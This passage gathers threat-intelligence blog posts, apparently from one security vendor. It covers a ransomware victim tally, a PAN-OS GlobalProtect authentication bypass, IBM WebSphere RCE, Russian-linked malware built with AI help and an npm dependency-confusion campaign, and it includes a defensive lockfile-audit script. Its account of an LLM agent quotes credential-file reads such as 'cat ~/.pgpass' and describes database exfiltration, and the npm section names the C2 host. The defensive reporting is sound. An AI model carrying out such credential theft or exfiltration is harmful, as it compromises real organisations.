| 8 | Kairos | 1 | Commune de camiers | France | Government / Public Sector |
| 9 | Krybit | 1 | Ecci-srl.com | Italy | Education |
| 10 | PEAR | 1 | Plexsupply inc | United States | Retail & Ecommerce |
| 11 | Termite | 1 | Https://www.imminet.com/ | United States | Manufacturing |
| 12 | Titan | 1 | Apex maritime co., inc. | United States | Transportation & Logistics |

Nova (RALord) led the activity with three victims, targeting entities like Daegu University in South Korea and an automotive service provider in the United States. DragonForce, a ransomware group, added two new victims, including a manufacturing company and a hospitality business. Lapsus, which has carried out high-profile breaches, claimed two new victims, Github internal and Ingka group (ikea), impacting the technology and retail sectors. The CMD ransomware group also reported activity, targeting legal services.

Further insights into DragonForce's operations can be found in our deep dive on DragonForce ransomware's real estate and healthcare targeting, and information on the CMD ransomware group is available in our CMD ransomware healthcare and nonprofit blog post. The victim pool showed high diversity across sectors and geographies. The United States experienced the highest concentration of attacks.
### Victim Distribution

By Country

- United States: 10
- South Korea: 2
- Brazil: 1
- France: 1
- Italy: 1
- Netherlands: 1

By Industry

- Software Development: 2
- Government: 1
- Education: 1
- Retail: 1
- Entertainment: 1
- Higher Education: 1
- Heavy-Duty Truck Customization and Repair: 1
- Hospitality: 1
- Legal Services: 1
- Medical Laboratory Services: 1

The United States remains the primary target geography for ransomware operations, accounting for over half of all reported victims in this period. Industry targeting remains fragmented, with no single sector experiencing a concentrated surge. This suggests opportunistic or broadly distributed campaigns rather than specialized attacks.

### Ransomware News

Topline - An in-depth review of a city's recovery from an Interlock ransomware attack shows the critical role of pre-existing incident response plans and effective recovery strategies.

Campaigns & Operations - St. Paul, Minnesota, successfully recovered from an Interlock ransomware attack that occurred in July 2025 without paying the ransom. The city's response involved a cross-agency effort, including emergency management, state IT, federal investigators, private cybersecurity partners, and the Minnesota National Guard, all guided by a solid incident response plan and nightly backups.

Vulnerabilities & TTPs - The recovery prioritized essential services like 911 and payroll, with full restoration by the third week of August. A full "Operation Secure St. Paul" initiative involved a large-scale password reset for over 3,000 employees, enforcement of multi-factor authentication (MFA), device checks, and enhanced endpoint detection. National Guard FirstNet connectivity provided support for these efforts.

Analyst Note - This incident shows that proactive preparedness, including strong incident response frameworks and complete backup regimes, helps mitigate ransomware impact and avoid ransom payments.
### Technical Takeaways

- Nova (RALord) was the most active ransomware group in the past 24 hours, observed with three new victims.
- Ransomware activity remains globally distributed, with new victims reported across North America, Asia, and Europe.
- The United States represents the main target geography, accounting for 10 of the 16 reported victims.
- Industry targeting is diverse, with no single sector experiencing a significant concentration of attacks.
- Organizations including Github internal and Ingka group (ikea) were impacted by the Lapsus ransomware group.

---

## Palo Alto GlobalProtect CVE-2026-0257 Actively Exploited

- URL: https://purple-ops.io/blog/cve-2026-0257-palo-alto-globalprotect
- Date: 2026-05-30
- Category: CVE Analysis
- Tags: palo-alto, globalprotect, cve-2026-0257, authentication-bypass, actively-exploited
- Reading time: 5 min | CVSS: 9.8

**Summary:** Palo Alto Networks PAN-OS GlobalProtect CVE-2026-0257 is a critical authentication bypass actively exploited.

Palo Alto Networks' PAN-OS, specifically its GlobalProtect VPN gateways, has a critical authentication bypass vulnerability, CVE-2026-0257. This flaw allows unauthenticated remote attackers to gain unauthorized access to enterprise networks, circumventing security perimeters. Active exploitation of CVE-2026-0257 has been confirmed, leading to its inclusion in the CISA Known Exploited Vulnerabilities catalog on May 29, 2026.

The vulnerability stems from an insecure authentication token validation process within the GlobalProtect feature: a critical signature verification step is omitted after token decryption. Threat actors are using this defect to forge valid session cookies, bypassing normal authentication and gaining unauthorized access. Attacks have been observed in multiple waves, with initial signs dating back to May 17, 2026, and continuing with a secondary wave on May 21st.
Organizations using affected Palo Alto Networks PAN-OS configurations should prioritize immediate patching or apply vendor-supplied mitigation steps. Failure to address CVE-2026-0257 can result in severe compromise, including full internal network access, as observed in active campaigns.

### What is CVE-2026-0257 and why is it critical?

CVE-2026-0257 is an authentication bypass vulnerability affecting Palo Alto Networks PAN-OS appliances when configured with specific GlobalProtect VPN settings. It is critical because it permits unauthenticated remote attackers to bypass the authentication process, leading directly to unauthorized access to an organization's internal network resources. Its active exploitation makes it an immediate threat to any vulnerable environment.

The flaw allows an adversary to assume an authenticated state without providing legitimate credentials, nullifying a primary security control. This direct circumvention of authentication mechanisms is a severe security defect; it undercuts the principle of verifying user identity before granting network access. Such vulnerabilities often enable attackers to establish a foothold for lateral movement, data exfiltration, deployment of additional malicious payloads, or persistent access within the compromised network. The observed exploitation, including successful acquisition of VPN IP assignments and subsequent internal network access, shows the risk CVE-2026-0257 poses to corporate environments globally.

### Impact

An attacker successfully exploiting CVE-2026-0257 can achieve a total authentication bypass on vulnerable Palo Alto Networks PAN-OS GlobalProtect VPN gateways. This allows unauthorized access to enterprise perimeter networks, nullifying the security posture provided by the VPN. The direct consequence is that threat actors can establish an authenticated session, granting them a foothold within the corporate network. The real-world reach of this vulnerability is broad.
Observed exploitation campaigns have demonstrated that attackers can obtain full internal network access after successfully receiving a VPN IP assignment through this bypass. This level of access can lead to severe compromises, including unauthorized access to sensitive data, deployment of malware, lateral movement within the network, and establishment of persistent access. Organizations that rely on GlobalProtect for secure remote access and have configurations vulnerable to CVE-2026-0257 are at immediate risk of network intrusion and internal system compromise.

This type of authentication bypass, where cryptographic weaknesses allow for forged credentials, is similar to other critical vulnerabilities, such as the FortiOS authentication bypass that has also seen active exploitation.

### Exploitation chain

Exploitation of CVE-2026-0257 by threat actors relies on a specific configuration and a critical validation flaw within the Palo Alto Networks PAN-OS GlobalProtect authentication override mechanism. The attack vector is remote and unauthenticated, targeting the server-side processing of authentication tokens.

The vulnerability's technical foundation lies within a specialized access feature designed to simplify the user login experience for GlobalProtect portals and gateways. This feature enables the issuance of authentication cookies to previously authenticated users, allowing them to use these tokens for future web communications without re-supplying raw credentials.

A critical validation defect exists within the core binary decryption handler responsible for processing these tokens. When an incoming authentication token is base64-decoded and subsequently decrypted using a private key, the decrypted content is then implicitly trusted. The critical flaw is the complete absence of any signature verification after this decryption process.
The preconditions for successful exploitation are crucial: the vulnerability specifically affects devices configured to reuse the primary portal certificate across multiple network features. This includes scenarios where the primary portal certificate, typically used for public HTTPS services, is also employed for encrypting and decrypting GlobalProtect authentication tokens. In such cases, a remote unauthenticated attacker can capture the public key associated with this shared certificate. With the public key in hand, the adversary can construct and encrypt forged security cookies. When these crafted cookies are presented to the vulnerable PAN-OS appliance, the device processes them server-side, implicitly trusting the decrypted content because of the missing signature check. As a direct result, the appliance grants the attacker unauthorized access, a total authentication bypass.

Active exploitation of CVE-2026-0257 has been observed. Forensic investigators noted the earliest signs of unauthorized access attempts on May 17, 2026. During this initial wave, attackers launched authentication probes from Vultr hosting infrastructure. A secondary wave of attacks was identified on May 21st, employing a different infrastructure provider, Dromatics Systems. Despite the shift in network location, investigators identified a consistent MAC address across both campaigns, suggesting a single threat group is behind these operations. In the second observed wave, attackers successfully used the vulnerability to obtain full internal network access after being assigned a VPN IP.

For further context on critical exploits in Palo Alto Networks products, refer to our prior analysis of CVE-2024-3400.

### Affected products and versions

The CVE-2026-0257 authentication bypass vulnerability affects Palo Alto Networks PAN-OS when configured in specific scenarios related to its GlobalProtect feature.
- Product: Palo Alto Networks PAN-OS
- Component: GlobalProtect portal and gateway functionality.
- Affected Configurations: The vulnerability affects appliances running PAN-OS with GlobalProtect VPN configurations that reuse the primary portal certificate across multiple network features. Devices are vulnerable if the certificate used for public HTTPS services is also employed for issuing and validating GlobalProtect authentication tokens.
- Version Information: Research findings do not specify particular PAN-OS version numbers affected by CVE-2026-0257. The vulnerability's exploitability is tied to the certificate management configuration rather than to a specific software version range.

### Detection

Detecting exploitation of CVE-2026-0257 can be challenging; standard network monitoring tools might not immediately identify the underlying cookie validation anomaly. Several indicators can point to potential or active compromise:

- Unusual GlobalProtect VPN Connections: Monitor for successful GlobalProtect VPN connections from external IP addresses not typically associated with legitimate organizational users or established VPN client pools. This includes connections from known suspicious IP ranges or unexpected geographic locations.
- Anomalous Authentication Attempts: Review authentication logs for the GlobalProtect portal and gateway for unusual login patterns. Look for a high volume of authentication probes or successful logins from IP addresses associated with known hosting providers or suspicious autonomous systems, such as Vultr or Dromatics Systems, which have been linked to observed exploitation.
- VPN IP Assignment Without Credential-Based Authentication: Investigate any instance where a client or user account is assigned a GlobalProtect VPN IP address without a preceding successful credential-based authentication event. This indicates a potential bypass of the standard login process.
- Irregular Cookie Structures/Token Exchanges: If deep packet inspection or advanced network traffic analysis capabilities are in place, look for anomalies in the structure or exchange of GlobalProtect authentication cookies that might indicate tampering or forgery. This would involve identifying tokens that bypass the typical signature validation flow.
- Certificate Usage Review: Review internal certificate management logs and configurations to identify instances where the primary portal certificate is used for both public HTTPS services and GlobalProtect authentication token management. This specific configuration is a precondition for CVE-2026-0257 exploitation.

Similar authentication bypasses have affected other vendors, as discussed in our analysis of a Cisco SD-WAN flaw.

### Remediation

Immediate remediation is critical for organizations operating Palo Alto Networks PAN-OS with affected GlobalProtect configurations, given the active exploitation of CVE-2026-0257.

- Patching: Upgrade Palo Alto Networks PAN-OS perimeter appliances to vendor-supplied patches urgently. Organizations should consult the official security advisory for CVE-2026-0257 provided by Palo Alto Networks for specific patch versions and deployment instructions. The vendor's advisory is available at security.paloaltonetworks.com/CVE-2026-0257.
- Workarounds (if immediate patching is not possible):
  - Disable Authentication Override: As an emergency configuration adjustment, administrators can disable the authentication override feature within the GlobalProtect portal dashboard. This prevents the issuance and acceptance of authentication cookies, removing the vulnerability vector.
  - Unique Certificate for Cookie Management: Alternatively, engineers can generate and configure a unique, dedicated certificate exclusively for GlobalProtect cookie management. This new certificate must not be reused across other public-facing HTTPS services, which breaks the precondition that allows attackers to obtain the public key for forging tokens.
- Enhanced Monitoring: Implement continuous monitoring for unauthorized access attempts and post-exploitation activity, particularly focusing on GlobalProtect VPN gateways. This includes scrutinizing VPN connection logs, authentication failure/success events, and any unusual internal network activity from VPN-assigned IP addresses.

### Technical Takeaways

- CVE-2026-0257 is an actively exploited authentication bypass vulnerability in Palo Alto Networks PAN-OS GlobalProtect.
- The vulnerability is a cryptographic bypass, stemming from implicit trust of decrypted authentication tokens without subsequent signature verification.
- Successful exploitation relies on a certificate management misconfiguration, specifically reuse of the primary portal certificate across public-facing services and GlobalProtect cookie management.
- Observed attacks have resulted in threat actors gaining full internal network access after successfully bypassing authentication.
- Immediate patching or applying the specific configuration workarounds, disabling authentication override or using a unique certificate for cookie management, is critical for reducing the threat.

---

## Palo Alto CVE-2026-0257 Exploit Bypasses GlobalProtect

- URL: https://purple-ops.io/blog/palo-alto-cve-2026-0257-exploit
- Date: 2026-05-30
- Category: Threat Intelligence
- Tags: palo-alto, cve-2026-0257, globalprotect, vulnerability, ai-attacks
- Reading time: 5 min

**Summary:** Palo Alto Networks CVE-2026-0257, a medium-severity authentication bypass, is actively exploited, allowing unauthorized GlobalProtect VPN connections.

Recent cybersecurity intelligence shows that offensive capabilities have increased significantly.
Attackers are actively exploiting critical network infrastructure vulnerabilities and using artificial intelligence in their operations. A medium-severity authentication bypass vulnerability, CVE-2026-0257, affecting Palo Alto Networks PAN-OS and Prisma Access GlobalProtect, is being actively exploited. This flaw allows unauthorized VPN connections and access to internal networks, creating an immediate, severe risk for organizations globally.

Cybersecurity firm Rapid7 observed successful exploitation of CVE-2026-0257 across many customers. Initial attempts were recorded on May 17, 2026, followed by a second wave on May 21, 2026. The consistent tactics suggest a single, persistent threat actor is behind these campaigns, using the vulnerability to gain direct entry into targeted environments. The observed activity involves attackers being assigned VPN IP addresses, confirming their ability to bypass authentication and establish an unauthorized network presence.

Beyond these critical infrastructure compromises, new, sophisticated Russian-linked actors like GREYVIBE integrate generative AI into multi-vector campaigns against Ukrainian entities. An unknown threat actor also used a large language model (LLM) agent to manage complex post-exploitation activities after a Marimo remote code execution (RCE) via CVE-2026-39987. At the same time, a large npm dependency confusion attack infiltrated corporate developer ecosystems, exploiting supply chain weaknesses to deliver reconnaissance payloads. These incidents show a dynamic threat environment where attackers quickly weaponize both known vulnerabilities and new attack methods.

### How attackers exploit CVE-2026-0257 in PAN-OS GlobalProtect

Attackers are actively using CVE-2026-0257, an authentication bypass vulnerability in the Palo Alto Networks PAN-OS software and Prisma Access GlobalProtect portal and gateway, to establish unauthorized VPN connections.
This flaw, with a CVSS score of 7.8, affects firewalls configured with the GlobalProtect portal or gateway when authentication override cookies are enabled and a specific certificate configuration is present. Successful exploitation gives attackers the ability to bypass security restrictions at the network perimeter.

Palo Alto Networks disclosed the vulnerability on May 13, 2026, and later confirmed active exploitation by May 29, 2026. Rapid7 provided more details, identifying successful exploitation attempts dating back to May 17, 2026, with a surge observed on May 21, 2026. The consistency in attack patterns suggests a single threat actor orchestrated both waves of exploitation. During these attacks, Rapid7 confirmed instances where attackers were successfully assigned VPN IP addresses, meaning they had established an unauthorized presence within victim internal networks.

No immediate follow-on activity was reported in the directly compromised customer environments. However, establishing a VPN session represents a critical breach of perimeter defenses. An authentication bypass on an edge-facing enterprise VPN appliance can have severe implications, potentially serving as a persistent backdoor for future malicious operations.

Organizations should apply vendor-supplied patches quickly. Temporary mitigation strategies include disabling the authentication override feature entirely or generating a new, unique certificate exclusively for the authentication override feature. This flaw directly compromises perimeter defenses, allowing adversaries to bridge external access to internal systems.

### The new Russia-linked GREYVIBE group and its AI-powered tactics

GREYVIBE, a previously undocumented Russian-speaking threat actor, has targeted various Ukrainian and Ukraine-related entities since at least August 2025. The group uses generative artificial intelligence (GenAI) and large language models (LLMs) to improve its operations.
Identified by WithSecure, the group's activities align with Kremlin state interests, focusing on intelligence gathering for the Russo-Ukrainian war. Victims include military, government, civilian, and business organizations, showing a broad mandate.

GREYVIBE uses multiple attack vectors and custom tools. Its attack chains include:

- PhantomMail: Spear-phishing emails deliver malicious ZIP or RAR archives, often hosted on Google Drive or 4sync. These archives contain JavaScript-based loaders that launch decoy documents and deploy PhantomRelay, a PowerShell-based remote access trojan (RAT) for host profiling and script execution.
- PhantomClick: This vector uses ClickFix-style fake CAPTCHA pages on bogus domains that pretend to be legitimate services like Zoom or LAPAS. Users are tricked into executing commands that start a PhantomRelay infection.
- PrincessClub: Fake Ukrainian adult-club websites deliver malware. On Android, it deploys FallSpy, an Android spyware for sensitive data harvesting. On Windows, it delivers PhantomRelayV1 or LegionRelay, a lightweight PowerShell-based RAT capable of file enumeration, exfiltration, screenshot capture, browser data theft, and Telegram and WhatsApp data exfiltration. Later versions included WebRTC-based live call features to capture audio and video.
- DroneLink: Websites impersonating charitable foundations supporting the Armed Forces of Ukraine distribute WireGuard and LegionRelay.
- Nebo: A FallSpy sample mimicking a Russian-language login screen attempts to deceive Ukrainian military personnel into compromising their devices.

The group uses AI platforms such as Ideogram AI, OpenAI ChatGPT, and Google Gemini for image generation, malware development (e.g., LegionRelay), obfuscation, loader scripts, backend infrastructure, and post-compromise commands. This AI integration helps GREYVIBE overcome technical expertise gaps, speed up development, and reduce reliance on known tools that could aid attribution.
This reflects a trend among threat actors, including APT28, who also use AI in their campaigns, as detailed in our analysis of APT28's LLM-powered phishing and custom malware.

Despite its nation-state affiliations, GREYVIBE has ties to the broader Russian cybercrime ecosystem, and some members may be current or former cybercriminal actors. Evidence includes possible access to an ISO builder linked to the TrickBot gang and UAC-0098, the presence of PhantomRelay variants in unrelated cybercrime activity (such as Microsoft Teams voice phishing campaigns and KongTuke delivery chains), early development samples uploaded to VirusTotal, the use of internet slang in development artifacts, and the deployment of the XMRig miner on some infected machines. The group operates in a complex space between cybercrime and state-affiliated operations, making traditional attribution difficult. For more on the activities of Russian-linked APTs and new malware campaigns, further research provides context. The group's activities show an increasing trend of state-affiliated actors mixing with cybercriminal elements and using advanced AI for offensive purposes.

### How an LLM agent conducted post-exploitation after a Marimo RCE

An unknown threat actor recently used a large language model (LLM) agent to automate sophisticated post-compromise actions. This was observed after the exploitation of a publicly accessible Marimo network via CVE-2026-39987. This critical pre-authenticated remote code execution (RCE) vulnerability affects all Marimo versions up to and including 0.20.4, allowing an unauthenticated attacker to execute arbitrary system commands. The flaw has been addressed in version 0.23.0.

Sysdig documented this incident on May 10, 2026. The attack chain lasted just over an hour. The attacker first compromised a vulnerable Marimo notebook, then quickly moved through several stages:

- Credential Extraction: Two cloud credentials were taken from the compromised host.
- Key Retrieval: These credentials were used through a fanned-out egress pool to retrieve an SSH private key from AWS Secrets Manager.
- SSH Pivoting: The retrieved SSH key was used for eight short, parallel SSH sessions against a downstream SSH bastion server.
- Data Exfiltration: During the bastion phase, the threat actor exfiltrated the schema and entire contents of an internal PostgreSQL database in under two minutes.

Sysdig identified four key indicators that an LLM agent was driving the post-exploitation activity:

- Schema Agnosticism: The attacker improvised a database dump without prior knowledge of the PostgreSQL schema. The agent adapted to the database structure to find and exfiltrate sensitive data.
- Planning Comment Leak: A Chinese-language planning comment, "看还能做什么" (translating to "See what else we can do"), leaked into the command stream during a credential search, indicating an automated planning process.
- Machine-Consumable Commands: Every command executed was designed for machine consumption, featuring "---" delimiters for separation, bounded output captures, disabled "less" usage, and discarded error streams (stderr) to minimize noise for an automated parser.
- Value Handoffs: Critical values, such as database passwords, were extracted and immediately fed as input into subsequent actions. This shows the agent's ability to chain commands dynamically based on previous outputs (e.g., cat ~/.pgpass followed by commands using the extracted password, or ls confirming an SSH key's presence before cat to print its contents).

This incident shows a shift from scripted attacks to adaptive, agent-driven operations where the "bar becomes inference budget, not playbook authorship." While a human operator might abort or fall back on hard-coded options when facing an unexpected environment, an AI agent can interpret the surprise, decide what to try next, and continue the attack.
This incident is a documented example of an AI agent adaptively driving an entire post-exploitation sequence, and it shows how far automated offensive capability has moved.

The recent npm dependency confusion attack against corporate networks

A single threat actor, operating the maintainer accounts mr.4nd3r50n, ce-rwb, and t-in-one, launched a large npm dependency confusion attack on May 28 and 29, 2026. The campaign targeted "prominent corporate environments" by impersonating internal packages across nine organizational scopes. Microsoft Threat Intelligence researchers identified dozens of rogue packages published in two concentrated bursts, built to get into developer pipelines. The attacker registered scopes that exactly mirrored real internal namespaces, including cloudplatform-single-spa, payments-widget, and sber-ecom-core, and published them with inflated version numbers, typically 100.100.100. When a client can obtain a package name from both an internal registry and the public registry, the highest version that satisfies the requested range wins, so an absurdly high public version displaces the authentic internal package. The infection chain triggers automatically through lifecycle hooks: each malicious package declares an install-time script hook, primarily postinstall, which runs a hidden postinstall.js as part of a standard install. This stager, about seven kilobytes of heavily obfuscated JavaScript, uses obfuscator.io-style string-array encoding and control-flow flattening to resist detection and manual analysis, and it includes self-defending routines that resist modification or analysis.
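The resolution behavior that lets the inflated 100.100.100 version win, and the postinstall hook that runs the stager, both leave traces in a project's lockfile and .npmrc. The following audit is an added example written for this page, not code from Microsoft Threat Intelligence or from npm; the lockfile excerpt, the private registry URL npm.internal.example and the package names under the campaign's scopes are constructed for illustration, and the version-number threshold is a heuristic:

```python
"""Audit an npm lockfile for the dependency-confusion pattern described above.

Added example, not code from Microsoft's report or from npm. It checks three
things a lockfile and .npmrc reveal: an internal-looking scope resolved from the
public registry, an implausibly inflated version, and a package that carries an
install-time script. The lockfile, the private registry URL and the package names
are constructed; the scope names echo the campaign but the packages are invented."""
from __future__ import annotations

PUBLIC_REGISTRY = "registry.npmjs.org"
INTERNAL_SCOPES = {"@cloudplatform-single-spa", "@payments-widget", "@sber-ecom-core"}
INTERNAL_REGISTRY = "https://npm.internal.example/"  # assumption: the company's private registry

# Weak .npmrc: only one of the three internal scopes is pinned to the private
# registry, so the other two fall through to the default (public) registry.
WEAK_NPMRC = "registry=https://registry.npmjs.org/\n@sber-ecom-core:registry=https://npm.internal.example/\n"

# Constructed lockfileVersion 3 excerpt. A wide range ("*") on the root
# dependency is what lets 100.100.100 satisfy it and win the resolution.
SAMPLE_LOCK = {
    "name": "checkout-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"@payments-widget/core": "*", "@sber-ecom-core/utils": "^2.0.0", "left-pad": "1.3.0"}},
        "node_modules/@payments-widget/core": {
            "version": "100.100.100",
            "resolved": "https://registry.npmjs.org/@payments-widget/core/-/core-100.100.100.tgz",
            "hasInstallScript": True,  # npm records this when (pre|post)install scripts exist
        },
        "node_modules/@sber-ecom-core/utils": {
            "version": "2.3.1",
            "resolved": "https://npm.internal.example/@sber-ecom-core/utils/-/utils-2.3.1.tgz",
        },
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
        },
    },
}


def pinned_scopes(npmrc: str) -> dict[str, str]:
    """Map '@scope' -> registry URL for every '@scope:registry=' line."""
    pins = {}
    for line in npmrc.splitlines():
        line = line.strip()
        if line.startswith("@") and ":registry=" in line:
            scope, _, url = line.partition(":registry=")
            pins[scope] = url.strip()
    return pins


def audit_lockfile(lock: dict, npmrc: str, internal_scopes: set[str], max_major: int = 50) -> list[dict]:
    """Return one finding per (package, issue); max_major is a heuristic cut-off."""
    pins = pinned_scopes(npmrc)
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # the root project entry
        name = path.rsplit("node_modules/", 1)[-1]
        scope = name.split("/")[0] if name.startswith("@") else None
        resolved = meta.get("resolved", "")
        version = meta.get("version", "0.0.0")
        if scope in internal_scopes and PUBLIC_REGISTRY in resolved:
            detail = ("pinned in .npmrc but lockfile still points at the public registry; regenerate it"
                      if scope in pins else "scope not pinned in .npmrc")
            findings.append({"package": name, "issue": "internal scope resolved from public registry", "detail": detail})
        first = version.split(".")[0]
        if first.isdigit() and int(first) >= max_major:
            findings.append({"package": name, "issue": "implausible version", "detail": version})
        if meta.get("hasInstallScript"):
            findings.append({"package": name, "issue": "install-time script present", "detail": version})
    return findings


def hardened_npmrc(internal_scopes: set[str], internal_registry: str) -> str:
    """Pin every internal scope to the private registry and block lifecycle scripts by default."""
    lines = ["registry=https://registry.npmjs.org/"]
    lines += [f"{scope}:registry={internal_registry}" for scope in sorted(internal_scopes)]
    lines.append("ignore-scripts=true")  # then `npm rebuild <pkg>` only for packages that genuinely need hooks
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for finding in audit_lockfile(SAMPLE_LOCK, WEAK_NPMRC, INTERNAL_SCOPES):
        print(finding)
    print(hardened_npmrc(INTERNAL_SCOPES, INTERNAL_REGISTRY))
```

Pinning a scope in .npmrc only affects future resolutions, so an existing lockfile that already points an internal scope at registry.npmjs.org stays flagged until it is regenerated. ignore-scripts=true stops every lifecycle hook, legitimate ones included; teams usually pair it with a short allow-list of packages rebuilt explicitly.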
Before downloading its final payload, the deobfuscated stager runs an eight-stage validation routine that includes:

- CI environment check: detects continuous integration environments and quietly exits if one is found, avoiding monitored build pipelines.
- Node.js version check: verifies that the active Node.js version is compatible.
- Cache deduplication: creates a unique local folder path to record prior installations and exits if a valid cache entry already exists, avoiding repeated network connections.

If these checks pass, an HTTPS GET request retrieves the primary payload from a remote server. By default the payload runs silently in a reconnaissance-only mode, collecting system information, hostnames, environment variables, and developer context. The operator can remotely toggle an environment variable named RECON_ONLY to switch to full exploitation, enabling credential theft, data exfiltration, or deployment of a secondary backdoor. Forensic metadata analysis tied the three maintainer accounts to a single operator through a shared hard-coded authentication value, l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1, sent as an X-Secret HTTP header on every outbound C2 request from every package across the three accounts. Historical registry data also indicates the actor moved from legitimate bug bounty research in April 2024 to deploying active malware two years later. The C2 domain used for payload retrieval is oob.moika.tech. This campaign shows that dependency confusion against developer pipelines remains effective.

Technical Takeaways

- CVE-2026-0257 in Palo Alto Networks PAN-OS GlobalProtect is under active exploitation, allowing unauthorized VPN connections and internal network access.
- The GREYVIBE group, a newly identified Russian-linked threat actor, uses generative AI and large language models in multi-vector cyber-espionage campaigns against Ukrainian entities.
- An LLM agent orchestrated post-exploitation, including credential theft from AWS Secrets Manager and PostgreSQL database exfiltration, after exploitation of Marimo CVE-2026-39987.
- A recent npm dependency confusion attack reached "prominent corporate environments" by spoofing internal package names and using the postinstall lifecycle hook to deliver reconnaissance payloads.
- Threat actors are increasingly integrating AI into malware development and post-exploitation, which challenges traditional detection and accelerates offensive capability.

---

## IBM WebSphere CVE-2026-8633 RCE (CVSS 9.8)

- URL: https://purple-ops.io/blog/ibm-websphere-cve-2026-8633-rce
- Date: 2026-05-30
- Category: CVE Analysis
- Tags: ibm, websphere, cve-2026-8633, rce, application-server
- Reading time: 5 min | CVSS: 9.8

**Summary:** IBM WebSphere CVE-2026-8633 is a critical RCE vulnerability (CVSS 9.8) affecting WebSphere Application Server using web server plug-ins.

IBM WebSphere CVE-2026-8633 RCE (CVSS 9.8)

IBM has issued an urgent security bulletin for a critical remote code execution (RCE) vulnerability, CVE-2026-8633, in WebSphere Application Server. It affects installations that use the optional web server plug-ins and carries a CVSS base score of 9.8 (critical), so administrators must act promptly. The flaw allows an unauthenticated attacker to execute arbitrary commands on the host via a specially crafted request, putting the confidentiality, integrity, and availability of affected WebSphere Application Server instances at serious risk. A secondary vulnerability, CVE-2026-8620, an HTTP request smuggling issue, was addressed in the same bulletin.
Administrators should prepare for immediate deployment of the latest software to mitigate these threats. IBM developed a permanent fix, APAR PH71342. This fix will be delivered through upcoming Fix Packs for affected WebSphere Application Server traditional and WebSphere Application Server Liberty versions. What is CVE-2026-8633 and why is it critical? CVE-2026-8633 is a critical remote code execution vulnerability affecting IBM WebSphere Application Server with a CVSS base score of 9.8. This high severity score reflects the potential for an unauthenticated attacker to execute arbitrary commands on the underlying host environment without requiring prior authentication. The flaw specifically resides within the Web Server Plug-ins component of WebSphere Application Server when they are in use. CVE-2026-8633 is critical for several reasons. First, arbitrary code execution grants attackers extensive control over a compromised system. This can lead to complete system compromise, data exfiltration, service disruption, or persistent access within an organization's network. Second, the attack is unauthenticated. Adversaries do not need valid credentials or to bypass existing authentication to exploit it. This lowers the barrier for attackers, making it a more accessible target for various threat actors. Third, the target is WebSphere Application Server, a core component in many enterprise infrastructures. It frequently handles sensitive data and business-critical applications. Compromising such a central component can have widespread, severe implications across an organization. The vulnerability's presence in Web Server Plug-ins indicates an issue in how these components process specially crafted requests. These plug-ins act as intermediaries between a web server (like Apache HTTP Server or IBM HTTP Server) and the WebSphere Application Server instance, directing requests to the correct application server. 
A flaw at this layer can let malicious input bypass security controls and reach the underlying application server or its host operating system in a way that leads to code execution. The urgency reflects the immediate threat to any organization running affected WebSphere Application Server versions with the optional web server plug-ins deployed.

Impact

An attacker exploiting CVE-2026-8633 achieves full remote code execution on the host running IBM WebSphere Application Server, with the ability to run arbitrary commands and take control of the server. Such a compromise affects the system's confidentiality, integrity, and availability and potentially other interconnected resources. The CVSS score of 9.8 rates the vulnerability as critical, the highest severity level. Organizations using the optional web server plug-ins with WebSphere Application Server are at risk; these plug-ins are common in enterprise deployments for load balancing, routing, and similar functions, which widens the exposed population. An unauthenticated attacker can use the flaw to:

- Execute system commands: run operating system commands with the privileges of the WebSphere Application Server process, potentially escalating to root or administrator.
- Deploy malicious payloads: install malware, backdoors, or other tooling for persistent access or as a foothold for lateral movement within the network.
- Exfiltrate sensitive data: access and steal confidential data processed or stored on the server, including customer information, intellectual property, and system configurations.
- Disrupt services: cause denial-of-service conditions by tampering with server configuration, deleting critical files, or exhausting system resources.
- Establish persistent access: create new user accounts, modify existing ones, or install web shells to retain access after initial exploitation.
This vulnerability affects enterprise web applications and middleware globally: IBM WebSphere Application Server is foundational for many large organizations, and compromise of these backend systems can lead to operational disruption, financial loss, and reputational damage. The situation resembles other critical unauthenticated RCE vulnerabilities that have threatened enterprise infrastructure, as discussed in our prior analysis of CVE-2026-45695 RCE.

Exploitation Chain

Attackers exploit CVE-2026-8633 through specially crafted HTTP requests aimed at the Web Server Plug-ins component of IBM WebSphere Application Server. No credentials or session tokens are needed to initiate the attack, so anyone with network access to the vulnerable plug-in can attempt it. Exploitation requires that the optional Web Server Plug-ins be deployed with WebSphere Application Server. These plug-ins integrate with external web servers such as IBM HTTP Server, Apache HTTP Server, or Microsoft IIS, proxying or redirecting requests to WebSphere Application Server. When a crafted request reaches the web server and is forwarded to the plug-in, a flaw in the plug-in's parsing or handling logic allows arbitrary code to be injected and executed on the WebSphere Application Server host. The public advisory does not describe the crafted request; vulnerabilities of this kind typically involve malformed headers, unexpected parameters, or payload injection that bypasses input validation. This unauthenticated RCE capability is a critical threat that requires prompt patching. Our research team previously covered a related vulnerability in this product in an earlier IBM WebSphere RCE analysis. A secondary vulnerability, CVE-2026-8620, introduces HTTP request smuggling opportunities.
HTTP request smuggling exploits discrepancies in how two HTTP devices (for example, a front-end proxy and a back-end server) decide where one request ends and the next begins. An attacker can "smuggle" an additional request inside a legitimate one, or cause the back end to treat part of the attacker's request as the start of the next request. Consequences of successful request smuggling include:

- Bypassing security controls: concealing malicious payloads inside legitimate traffic so that web application firewalls (WAFs) or intrusion prevention systems (IPS) never inspect them.
- Unauthorized access: reaching sensitive endpoints or internal services that would otherwise be protected.
- Cache poisoning: manipulating web caches so they serve malicious content to other users.
- Cross-site scripting (XSS) or other injection attacks: delivering payloads to other users through manipulated back-end responses.
- Chaining with other vulnerabilities: using smuggling as a stepping stone to further compromise.

At publication the advisory does not mention public proof-of-concept (PoC) exploits or confirmed in-the-wild exploitation for either CVE-2026-8633 or CVE-2026-8620. The "urgent security bulletin" designation and the CVSS score nevertheless indicate a critical risk that demands immediate attention regardless of PoC availability; unauthenticated RCE makes these vulnerabilities attractive targets.

Which IBM WebSphere versions are affected by CVE-2026-8633?

The affected IBM WebSphere Application Server versions for CVE-2026-8633 and CVE-2026-8620 span both the traditional and Liberty profiles:

- IBM WebSphere Application Server traditional: Version 8.5 (all fix packs) and Version 9.0 (all fix packs).
- IBM WebSphere Application Server Liberty: Version 8.5 (all fix packs) and Version 9.0 (all fix packs).
